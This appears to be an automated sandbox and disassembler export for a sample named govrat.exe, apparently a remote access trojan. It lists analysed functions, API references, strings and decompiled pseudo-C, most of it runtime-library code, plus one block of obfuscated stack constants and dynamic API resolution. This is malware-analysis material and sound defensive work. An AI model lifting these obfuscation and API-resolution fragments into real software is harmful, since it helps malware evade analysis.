Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095E466, Relevance: 1.5, APIs: 1, Instructions: 20

C-Code - Quality: 91%

			E0095E466(char __eax, intOrPtr _a4, intOrPtr _a8) {
				void* _t6;
				intOrPtr _t9;
				void* _t10;

				_t5 = __eax;
				_t9 = 0;
				_t10 =  *0x972f18 - _t9; // 0x0
				if(_t10 != 0) {
					_push(__eax); // executed
					_t6 = L009E6C07(); // executed
					_t5 = L00951D3E(_t6);
					 *0x972f18 = 0;
				}
				if(_a8 > _t9) {
					do {
						_t5 = L00951D50();
						 *((char*)(_t9 + _a4)) = _t5;
						_t9 = _t9 + 1;
					} while (_t9 < _a8);
				}
				return _t5;
			}

0x0095e466
0x0095e467
0x0095e469
0x0095e46f
0x0095e471
0x0095e472
0x0095e478
0x0095e47e
0x0095e47e
0x0095e488
0x0095e48a
0x0095e48a
0x0095e493
0x0095e496
0x0095e497
0x0095e48a
0x0095e49e

APIs

_rand.LIBCMT ref: 0095E48A

Part of subcall function 00951D50: __getptd.LIBCMT ref: 00951D50

Part of subcall function 00951D3E: __getptd.LIBCMT ref: 00951D43

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095D219, Relevance: 1.5, APIs: 1, Instructions: 10library

APIs

GetProcAddress.KERNEL32 ref: 0095D21A

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009604FD, Relevance: 1.5, APIs: 1, Instructions: 7

APIs

ExitProcess.KERNEL32(?,?,?,?), ref: 00960507

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009603C5, Relevance: 1.3, APIs: 1, Instructions: 98

C-Code - Quality: 80%

			E009603C5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v7;
				intOrPtr _v11;
				intOrPtr _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				intOrPtr _v27;
				intOrPtr _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				intOrPtr _v43;
				intOrPtr _v47;
				intOrPtr _v51;
				intOrPtr _v55;
				intOrPtr _v59;
				intOrPtr _v63;
				intOrPtr _v67;
				char _v68;
				char _v594;
				char _v596;
				char _v1114;
				char _v1116;
				char _v2156;
				intOrPtr _t36;
				short _t38;
				void* _t65;
				intOrPtr _t67;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				intOrPtr _t85;

				_t73 = __esi;
				_t72 = __edi;
				_t71 = __edx;
				_t70 = __ecx;
				_t36 =  *0x9759a8; // 0x41ae60
				_push(__ebx);
				_v11 = 0x86a4d5a3;
				_v15 = 0xa4a6b8a6;
				_v19 = 0xbda6e9ee;
				_v23 = 0xe5e38c8b;
				_v27 = 0xe2a6e9f2;
				_v31 = 0xe9e1a6a4;
				_v35 = 0xa3a4a6f5;
				_v39 = 0xf2f5effe;
				_v43 = 0xe3a6e0ef;
				_v47 = 0x8c8ba4d5;
				_v51 = 0xa3a4a6ea;
				_v55 = 0xe3e28c8b;
				_v59 = 0xe2bc8c8b;
				_v63 = 0xe0e0e9a6;
				_v67 = 0xe9eee5e3;
				_v68 = 0xc6;
				_v7 = 0;
				if(_t36 != 0) {
					_t65 =  *(_t36 + 8);
					if(_t65 != 0) {
						CloseHandle(_t65);
						_t67 =  *0x9759a8; // 0x41ae60
						 *((intOrPtr*)(_t67 + 8)) = 0;
					}
				}
				_t85 =  *0x9759a4; // 0x0
				if(_t85 == 0) {
					_t38 = E009602B6(0x974f18, __eflags);
					__eflags = _t38;
					if(_t38 == 0) {
						_v596 = _t38;
						L00958BA0( &_v594, 0, 0x206);
						L009601FD(__eflags,  &_v596); // executed
						_push( &_v596);
						return L0098B346( &_v596, _t71, _t72);
					}
					_push(_t73);
					_push(_t72);
					_push( &_v2156);
					L00962167(_t70, _t71, _t72, _t73);
					_v1116 = 0;
					L00958BA0( &_v1114, 0, 0x206);
					__eflags = 0;
					_v596 = 0;
					L00958BA0( &_v594, 0, 0x206);
					_push( &_v596);
					_push( &_v1116);
					_push( &_v2156);
					return L00A14979(L0095FB70(0, _t72, 0x206));
				} else {
					_v596 = 0;
					L00958BA0( &_v594, 0, 0x206);
					L009601FD(0,  &_v596);
					_push( &_v596);
					return L00A16901( &_v596);
				}
				goto L9;
			}

0x009603c5
0x009603c5
0x009603c5
0x009603c5
0x009603ce
0x009603d3
0x009603d6
0x009603dd
0x009603e4
0x009603eb
0x009603f2
0x009603f9
0x00960400
0x00960407
0x0096040e
0x00960415
0x0096041c
0x00960423
0x0096042a
0x00960431
0x00960438
0x0096043f
0x00960443
0x00960448
0x0096044a
0x0096044f
0x00960452
0x00960458
0x0096045d
0x0096045d
0x0096044f
0x00960460
0x00960466
0x009604bf
0x009604c4
0x009604c6
0x009604cd
0x009604dc
0x009604e8
0x009604f6
0x00000000
0x009604f7
0x0096050d
0x0096050e
0x00960515
0x00960516
0x00960523
0x00960532
0x00960537
0x0096053a
0x00960549
0x00960557
0x0096055e
0x00960565
0x00960573
0x00960468
0x0096046f
0x0096047e
0x0096048a
0x00960498
0x0096049e
0x0096049e
0x00000000

APIs

CloseHandle.KERNEL32(?), ref: 00960452

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009617BC, Relevance: 1.3, APIs: 1, Instructions: 37
sleep

C-Code - Quality: 54%

			E009617BC(void* __ebx, void* __esi, intOrPtr __fp0) {
				signed int _t19;
				void* _t27;
				void* _t28;
				intOrPtr _t33;

				_t33 = __fp0;
				_t27 = __esi;
				_t19 =  *(_t28 - 0xc) & 0x0000ffff;
				if(_t19 >=  *((intOrPtr*)(__ebx + 4))) {
					asm("fldz");
					 *((intOrPtr*)(_t28 - 8)) = __fp0;
					 *((intOrPtr*)(_t28 - 4)) = 0;
					if(_t19 <= 0) {
						L3:
						Sleep(_t19 * 0xa); // executed
						asm("fmulp st1, st0");
						 *((intOrPtr*)(_t28 - 8)) = st0;
						_push(L00968900(_t19 * 0xa,  *((intOrPtr*)(_t28 - 8))));
						_push( *(_t28 - 0xc) & 0x0000ffff);
						_push(_t27);
						_push( *((intOrPtr*)(_t28 + 8)));
						return L009E7FAC( *(_t28 - 0xc) & 0x0000ffff);
					} else {
						goto L2;
					}
					do {
						L2:
						asm("fild dword [ebp-0x4]");
						 *((intOrPtr*)(_t28 - 4)) =  *((intOrPtr*)(_t28 - 4)) + 1;
						_t33 = _t33 +  *((intOrPtr*)(_t28 - 8));
						 *((intOrPtr*)(_t28 - 8)) = _t33;
					} while ( *((intOrPtr*)(_t28 - 4)) < _t19);
					goto L3;
				}
				_push( *((intOrPtr*)(_t28 + 0x14)));
				_push( *((intOrPtr*)(_t28 + 0x10)));
				_push( *((intOrPtr*)(_t28 + 0xc)));
				_push( *((intOrPtr*)(_t28 + 8)));
				return L00986584(_t19);
			}

0x009617bc
0x009617bc
0x009617bc
0x009617c3
0x009617c5
0x009617c9
0x009617cc
0x009617d1
0x009617e4
0x009617e8
0x009617f3
0x009617f5
0x00961800
0x00961805
0x00961806
0x00961807
0x00000000
0x00000000
0x00000000
0x00000000
0x009617d3
0x009617d3
0x009617d3
0x009617d6
0x009617d9
0x009617dc
0x009617df
0x00000000
0x009617d3
0x00961810
0x00961813
0x00961816
0x00961819
0x00961821

APIs

Sleep.KERNELBASE(?), ref: 009617E8

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00958FD6, Relevance: 1.3, APIs: 1, Instructions: 30
sleep

C-Code - Quality: 100%

			E00958FD6(intOrPtr _a4, intOrPtr _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;
				void* _t12;
				void* _t13;

				_t8 = 0;
				while(1) {
					_t4 = E0095B2AC(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
					if(_t7 != 0) {
						break;
					}
					_t12 =  *0x973b84 - _t4; // 0x0
					if(_t12 > 0) {
						Sleep(_t8);
						_t3 = _t8 + 0x3e8; // 0x3e8
						_t6 = _t3;
						_t13 = _t6 -  *0x973b84; // 0x0
						if(_t13 > 0) {
							_t6 = _t6 | 0xffffffff;
						}
						_t8 = _t6;
						if(_t6 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t7;
			}

0x00958fdd
0x00958fdf
0x00958fe7
0x00958fec
0x00958fee
0x00958ff3
0x00000000
0x00000000
0x00958ff5
0x00958ffb
0x00958ffe
0x00959004
0x00959004
0x0095900a
0x00959010
0x00959012
0x00959012
0x00959015
0x0095901a
0x00000000
0x00000000
0x0095901a
0x00000000
0x00958ffb
0x00959021

APIs

Sleep.KERNEL32(00000000), ref: 00958FFE

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095E5EB, Relevance: 1.3, APIs: 1, Instructions: 29

C-Code - Quality: 91%

			E0095E5EB(void* __eax, void* __ebx) {
				void* __esi;
				intOrPtr _t12;
				intOrPtr* _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t22;
				intOrPtr _t23;
				void* _t25;
				void* _t27;

				if(__eax != 0) {
					_t13 =  *((intOrPtr*)(_t27 - 0xc));
					_t21 = _t13 + 1;
					do {
						_t23 =  *_t13;
						_t13 = _t13 + 1;
					} while (_t23 != __ebx);
					_t15 = E0095E526( *((intOrPtr*)(_t27 + 8)),  *((intOrPtr*)(_t27 - 0xc)), _t13 - _t21); // executed
					_push( *((intOrPtr*)(_t27 - 0xc)));
					 *((intOrPtr*)(_t27 - 0x10)) = 1;
					return L00A0AD11(_t15, __ebx);
				}
				E0095115B(_t19, _t22, _t25, _t25);
				CloseHandle( *(_t27 - 8));
				_t12 =  *((intOrPtr*)(_t27 - 0x10));
				return _t12;
			}

0x0095e5ed
0x0095e5ef
0x0095e5f2
0x0095e5f5
0x0095e5f5
0x0095e5f7
0x0095e5f8
0x0095e605
0x0095e60d
0x0095e610
0x00000000
0x0095e617
0x0095e61e
0x0095e627
0x0095e62e
0x0095e634

APIs

CloseHandle.KERNEL32(?), ref: 0095E627

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095D184, Relevance: 1.3, APIs: 1, Instructions: 17

C-Code - Quality: 20%

			E0095D184() {
				intOrPtr _v16;
				void* _t3;
				void* _t6;
				void* _t8;

				_push(0);
				_push(0);
				_push(1);
				_push(0);
				_t3 = L009C2812(0, _t6);
				_push(_v16);
				_t8 = _t3;
				_push(_t8);
				_push(_t3); // executed
				L00A145E0(); // executed
				return CloseHandle(_t8);
			}

0x0095d187
0x0095d188
0x0095d189
0x0095d18b
0x0095d18d
0x0095d192
0x0095d196
0x0095d198
0x0095d199
0x0095d19a
0x0095d1a7

APIs

CloseHandle.KERNEL32(00000000), ref: 0095D1A0

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00AACA42, Relevance: 1.3, APIs: 1, Instructions: 6

APIs

LocalAlloc.KERNELBASE ref: 00AACA46

Memory Dump Source

Source File: 00000001.00000001.13428611401.0000000000A18000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000001.13428594815.0000000000950000.00000002.sdmp
Associated: 00000001.00000001.13428806062.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_950000_govrat.jbxd

Non-executed Functions

Function 00ABFE67, Relevance: 2.9, Strings: 2, Instructions: 412

Strings

;<, xrefs: 00AC01C1
=<=, xrefs: 00AC0066

Memory Dump Source

Source File: 00000001.00000001.13428611401.0000000000A18000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000001.13428594815.0000000000950000.00000002.sdmp
Associated: 00000001.00000001.13428806062.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_950000_govrat.jbxd

Function 00AC01CE, Relevance: 1.4, Strings: 1, Instructions: 137

Strings

7!:V, xrefs: 00AC0347

Memory Dump Source

Source File: 00000001.00000001.13428611401.0000000000A18000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000001.13428594815.0000000000950000.00000002.sdmp
Associated: 00000001.00000001.13428806062.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_950000_govrat.jbxd

Function 00966000, Relevance: 1.0, Instructions: 996

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00966EED, Relevance: 1.0, Instructions: 996

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00967EA6, Relevance: .3, Instructions: 327

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095FB7F, Relevance: .2, Instructions: 158

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00982D1B, Relevance: .0, Instructions: 25

Memory Dump Source

Source File: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009589BC, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 137library

APIs

GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,00973288,00000314,00000000), ref: 00958A13
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00958A31
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00958A41
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00958A51
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00958A65

Strings

GetProcessWindowStation, xrefs: 00958A5F
MessageBoxW, xrefs: 00958A0D
GetUserObjectInformationW, xrefs: 00958A46
USER32.DLL, xrefs: 009589F2
GetLastActivePopup, xrefs: 00958A36
GetActiveWindow, xrefs: 00958A26

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0095261A, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 151

APIs

_wcslen.LIBCMT ref: 009526E5
_wcslen.LIBCMT ref: 009526F2

Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,MessageBoxW,00000000,USER32.DLL,00973288,00000314,00000000), ref: 00958A13
Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00958A31
Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00958A41
Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00958A51
Part of subcall function 009589BC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00958A65

_strlen.LIBCMT ref: 009527A5

Strings

Microsoft Visual C++ Runtime Library, xrefs: 0095274C
..., xrefs: 00952706
<program name unknown>, xrefs: 009526C5
Runtime Error!Program: , xrefs: 00952684

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00968DA6, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 327

APIs

Part of subcall function 009512FE: __getptd.LIBCMT ref: 00951311

__cftoe.LIBCMT ref: 00968E5D
_strrchr.LIBCMT ref: 00968EA4
__alldvrm.INT64 ref: 009690A2
__alldvrm.INT64 ref: 009690C8
__alldvrm.INT64 ref: 009690EE

Strings

0, xrefs: 00968DBF

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00961BBE, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103library

APIs

GetProcAddress.KERNEL32(00000000,32336C65,?,LoadLibraryA), ref: 00961C79
GetProcAddress.KERNEL32(00000000,?), ref: 00961C9D
GetProcAddress.KERNEL32(00000000), ref: 00961CAE

Strings

LoadLibraryA, xrefs: 00961C66, 00961C69
ExitProcess, xrefs: 00961CA1
kernel32, xrefs: 00961CA6

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009528CC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129

APIs

___crtGetStringTypeA.LIBCMT ref: 0095296A
___crtLCMapStringA.LIBCMT ref: 0095298A
___crtLCMapStringA.LIBCMT ref: 009529AF

Strings

, xrefs: 00952914

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00962F9F, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126library

APIs

CloseHandle.KERNEL32(00000004), ref: 00962FEB
GetProcAddress.KERNEL32(?,?,?,00000000,0000003C), ref: 00963020

Strings

(, xrefs: 0096317C
<, xrefs: 00962FC0

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 009692E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97

APIs

Part of subcall function 00968CBF: __fltout2.LIBCMT ref: 00968CEE

__fltout2.LIBCMT ref: 0096930B

Part of subcall function 00969AE7: ___dtold.LIBCMT ref: 00969B0D
Part of subcall function 00969AE7: _$I10_OUTPUT.LIBCMT ref: 00969B28

Part of subcall function 00969981: _strlen.LIBCMT ref: 00969A1C

__cftof2_l.LIBCMT ref: 00969398

Part of subcall function 0096911C: _strlen.LIBCMT ref: 0096919A
Part of subcall function 0096911C: _strlen.LIBCMT ref: 009691BE

Strings

-, xrefs: 00969338

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00968CBF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84

APIs

__fltout2.LIBCMT ref: 00968CEE

Part of subcall function 00969AE7: ___dtold.LIBCMT ref: 00969B0D
Part of subcall function 00969AE7: _$I10_OUTPUT.LIBCMT ref: 00969B28

Part of subcall function 00969981: _strlen.LIBCMT ref: 00969A1C

Strings

e+000, xrefs: 00968C2B
-, xrefs: 00968D39

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 0096921F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80

APIs

__fltout2.LIBCMT ref: 0096924A

Part of subcall function 00969AE7: ___dtold.LIBCMT ref: 00969B0D
Part of subcall function 00969AE7: _$I10_OUTPUT.LIBCMT ref: 00969B28

Part of subcall function 00969981: _strlen.LIBCMT ref: 00969A1C

__cftof2_l.LIBCMT ref: 009692C9

Part of subcall function 0096911C: _strlen.LIBCMT ref: 0096919A
Part of subcall function 0096911C: _strlen.LIBCMT ref: 009691BE

Strings

-, xrefs: 009692A2

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00957C70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72

APIs

_parse_cmdline.LIBCMT ref: 00957CC7

Part of subcall function 00958F8E: Sleep.KERNEL32(00000000,00000001,00951398,?,009583EF,00000018,00970B60,0000000C,0095847F,00951398,00000000,?,0095245F,00000008,00970A70,00000020), ref: 00958FAF

_parse_cmdline.LIBCMT ref: 00957D08

Strings

C:\Users\user\Desktop\govrat.exe, xrefs: 00957C8F, 00957C94

Memory Dump Source

Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_950000_govrat.jbxd

Function 00960B07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72registry

APIs
